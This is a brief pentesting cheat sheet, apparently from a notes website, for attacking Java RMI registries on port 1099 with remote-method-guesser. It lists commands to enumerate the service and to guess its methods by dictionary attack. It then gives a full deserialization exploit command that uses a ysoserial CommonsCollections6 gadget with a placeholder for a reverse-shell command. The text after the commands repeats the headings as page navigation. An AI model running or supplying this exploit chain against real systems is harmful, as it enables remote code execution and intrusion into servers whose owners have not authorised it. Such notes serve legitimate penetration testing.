RMI Registry Java Pentesting

Tool: https://github.com/qtc-de/remote-method-guesser

Port: 1099

STEPS:

1) Enumerate RMI protocol

java -jar rmg-4.4.1-jar-with-dependencies.jar enum IP_ADDRESS 1099

2) Guess methods in the service via a dictionary attack

java -jar rmg-4.4.1-jar-with-dependencies.jar guess IP_ADDRESS 1099

3) Conduct a serialization attack against the service

java -jar rmg-4.4.1-jar-with-dependencies.jar serial IP_ADDRESS 1099 --yso /opt/ysoserial.jar --bound-name monitoring --signature 'String sendData(String dummy,Object dummy2)' CommonsCollections6 'COMMAND_HERE_TO_REVERSE_SHELL'

PreviousPost Office Protocol (POP3)NextReal-Time Streaming Protocol (RTSP)

Last updated 8 months ago

hashtagTool: https://github.com/qtc-de/remote-method-guesser

hashtagPort: 1099

hashtagSTEPS:

hashtag1) Enumerate RMI protocol

hashtag2) Guess methods in the service via a dictionary attack

hashtag3) Conduct a serialization attack against the service

Tool: https://github.com/qtc-de/remote-method-guesser

Port: 1099

STEPS:

1) Enumerate RMI protocol

2) Guess methods in the service via a dictionary attack

3) Conduct a serialization attack against the service